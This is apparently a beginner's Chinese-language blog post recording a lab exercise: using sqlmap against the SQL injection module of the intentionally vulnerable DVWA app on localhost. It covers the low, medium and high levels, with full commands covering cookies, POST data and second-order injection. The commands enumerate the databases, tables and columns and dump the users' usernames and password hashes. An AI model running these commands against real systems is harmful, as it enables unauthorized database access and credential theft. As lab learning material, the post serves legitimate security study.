第一次写博客,目前自己处于一个新手状态,写一下博客来记录一下学习
今天要记录的是用sqlmap来注入dvwa里的sql注入模块
先从low等级开始
用sqlmap进行爆破:sqlmap -u "url"
从得到的结果中能看到我们是需要cookie的,然后去dvwa看一下cookie
然后在命令中加入cookie:sqlmap -u "url" --cookie="security=low,PHPSESSID=mtfmtpa2rhgnr887auaudgsm00"
查看数据库,在后面加上 --dbs就行了
就得到服务器上所有的数据库,然后简单的分析一下或者穷举就能找到我们要爆破的数据库
然后爆破表:sqlmap -u "url" --cookie="..." -D dvwa --tables
得到数据表
接下来就是爆破列:sqlmap -u "url" --cookie="..." -D dvwa -T users --columns
然后再爆破字段:sqlmap -u "url" --cookie="..." -D dvwa -T users -C user,password --dump
然后就得到了所有的用户名和密码
然后是medium
这里的传输方式改成了post所以url中没有参数,我们用burpsuite抓包看一下参数
由于是post传输,所以这里要用--data把数据引入过来:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小写)" --cookie="security=medium;PHPSESSID=...." --dbs
然后接下来的步骤就和上面的一样了:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小写)" --cookie="security=medium;PHPSESSID=...." -D dvwa -T users -C user,password --dump
然后是high等级
high等级这里是一个链接点击过后会跳转到另一个页面,这个如果用sqlmap进行爆破就要设计到二阶sql注入:有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。-–second-order
后面跟一个判断页面的URL地址。
首先还是用burpsuite进行抓包查看参数可以发现是与medium是类似的:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" --dbs
然后再与上面的步骤一样就可以了:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump